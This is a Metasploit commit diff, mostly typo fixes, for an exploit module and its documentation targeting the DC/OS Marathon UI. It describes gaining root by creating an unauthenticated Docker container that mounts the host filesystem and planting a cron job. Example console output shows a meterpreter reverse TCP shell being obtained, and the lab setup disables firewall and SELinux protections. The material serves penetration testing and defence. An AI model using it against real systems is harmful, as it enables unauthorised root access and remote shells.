Updated based on busterb comments

wolfthefallen · wolfthefallen · commit bac23757a4c8 · 2017-05-30T09:33:03.000-04:00
diff --git a/documentation/modules/exploit/linux/http/dcos_marathon.md b/documentation/modules/exploit/linux/http/dcos_marathon.md
@@ -2,36 +2,36 @@
 Utilizing the DCOS Cluster's Marathon UI, an attacker can create
 a docker container with the '/' path mounted with read/write
 permissions on the host server that is running the docker container.
-As the docker container excutes command as uid 0 it is honored
+As the docker container executes command as uid 0 it is honored
 by the host operating system allowing the attacker to edit/create
 files owed by root. This exploit abuses this to creates a cron job
 in the '/etc/cron.d/' path of the host server.
 
-*Notes: The docker image must be a valid docker image from 
+*Notes: The docker image must be a valid docker image from
 hub.docker.com. Further more the docker container will only
 deploy if there are resources available in the DC/OS
 
 ## DCOS
-This Expoit was tested with CentOS 7 as the host operating system for
+This Exploit was tested with CentOS 7 as the host operating system for
 the 2 services of the DCOS cluster. With DCOS version 1.7 and 1.8, with
-Defualt 'custom' installation for on site premise setup. Only the Install
+Default 'custom' installation for on site premise setup. Only the Install
 part of the DCOS guide was completed, the system hardening and securing
-your cluster section where skipped. This is to represent a 'Defualt' install
+your cluster section where skipped. This is to represent a 'Default' install
 with a system admin conducting hasty deployments taking no thought about security.
 
 
 ## To Setup Your Cluster
-I recommend doing a 'On-Premies'/custom
+I recommend doing a 'on-premise'/custom
 cluster. https://dcos.io/docs/1.8/administration/installing/custom/
 Create a virtual CentOS machine, install requirements base on the above
 guide.
- 
+
 ```bash
 # The TLDR from the above guide
 sudo systemctl stop firewalld && sudo systemctl disable firewalld
 sudo yum install -y tar xz unzip curl ipset ntp
-systemctl start ntpd
-systemctl enable ntpd
+sudo systemctl start ntpd
+sudo systemctl enable ntpd
 sudo sed -i s/SELINUX=enforcing/SELINUX=permissive/g /etc/selinux/config && \
    sudo groupadd nogroup && sudo reboot
 ```
@@ -60,7 +60,7 @@ Once the CentOS machine has rebooted, edit the systemctl
 service file for docker and change the ExecStart- line to
 `ExecStart=/usr/bin/docker daemon --storage-driver=overlay -H fd://`
 restart the docker service and verify it is running.
-lastely generate ssh rsa keys for authentication. And update the 
+lastly generate ssh rsa keys for authentication. And update the
 /etc/ssh/sshd_config file to support root login.
 
 ```bash
@@ -77,10 +77,10 @@ Start the DCOS-Master and DCOS-Agent virtual machines You just cloned.
 Login and get their current IP address.
 * Note: I recommend giving them static IPs if you have further use for the cluster.
 
-From here use another linux machine with docker installed to finish
-the installation process. I used an ubuntu machine with docker installed.
+From here use another Linux machine with docker installed to finish
+the installation process. I used an Ubuntu machine with docker installed.
 
-Follow the custom CLI guide for creating the required files in 
+Follow the custom CLI guide for creating the required files in
 the genconf folder.
 https://dcos.io/docs/1.8/administration/installing/custom/cli/
 
@@ -137,9 +137,9 @@ If all is passing navigate to http://[master_ip]:8080/
 You should see the Marathon UI web application.
 
 # Exploitation
-This module is designed for the attacker to leaverage the creatation of a
-docker contianer with out authentication through the DCOS Marathon UI
-to gain root access to the hosting server of the docker container 
+This module is designed for the attacker to leverage, creation of a
+docker container with out authentication through the DCOS Marathon UI
+to gain root access to the hosting server of the docker container
 in the DCOS cluster.
 
 ## Options
@@ -157,7 +157,7 @@ in the DCOS cluster.
 
 ## Example Output
 ```
-msf > use exploit/linux/http/dcos_marathon 
+msf > use exploit/linux/http/dcos_marathon
 msf exploit(dcos_marathon) > set RHOST 192.168.0.9
 RHOST => 192.168.0.9
 msf exploit(dcos_marathon) > set payload python/meterpreter/reverse_tcp
@@ -168,9 +168,9 @@ msf exploit(dcos_marathon) > set verbose true
 verbose => true
 msf exploit(dcos_marathon) > check
 [*] 192.168.0.9:8080 The target appears to be vulnerable.
-msf exploit(dcos_marathon) > exploit 
+msf exploit(dcos_marathon) > exploit
 
-[*] Started reverse TCP handler on 192.168.0.100:4444 
+[*] Started reverse TCP handler on 192.168.0.100:4444
 [*] Setting container json request variables
 [*] Creating the docker container command
 [*] The docker container is created, waiting for it to deploy
@@ -188,5 +188,5 @@ OS              : Linux 3.10.0-327.36.3.el7.x86_64 #1 SMP Mon Oct 24 16:09:20 UT
 Architecture    : x64
 System Language : en_US
 Meterpreter     : python/linux
-meterpreter > 
+meterpreter >
 ```
diff --git a/modules/exploits/linux/http/dcos_marathon.rb b/modules/exploits/linux/http/dcos_marathon.rb
@@ -3,8 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-require 'msf/core'
-
 class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
@@ -18,7 +16,7 @@ def initialize(info = {})
         Utilizing the DCOS Cluster's Marathon UI, an attacker can create
         a docker container with the '/' path mounted with read/write
         permissions on the host server that is running the docker container.
-        As the docker container excutes command as uid 0 it is honored
+        As the docker container executes command as uid 0 it is honored
         by the host operating system allowing the attacker to edit/create
         files owed by root. This exploit abuses this to creates a cron job
         in the '/etc/cron.d/' path of the host server.
@@ -32,10 +30,6 @@ def initialize(info = {})
       'References'     => [
         [ 'URL', 'https://warroom.securestate.com/dcos-marathon-compromise/'],
       ],
-      'Payload'        =>
-        {
-          'DisableNops'=> true,
-        },
       'Targets'            => [
         [ 'Python', {
             'Platform'   => 'python',
@@ -58,7 +52,7 @@ def initialize(info = {})
         OptString.new('TARGETURI', [ true, 'Post path to start docker', '/v2/apps' ]),
         OptString.new('DOCKERIMAGE', [ true, 'hub.docker.com image to use', 'python:3-slim' ]),
         OptString.new('CONTAINER_ID', [ false, 'container id you would like']),
-        OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wiat for the docker container to deploy', 60 ])
+        OptInt.new('WAIT_TIMEOUT', [ true, 'Time in seconds to wait for the docker container to deploy', 60 ])
       ], self.class)
   end
 
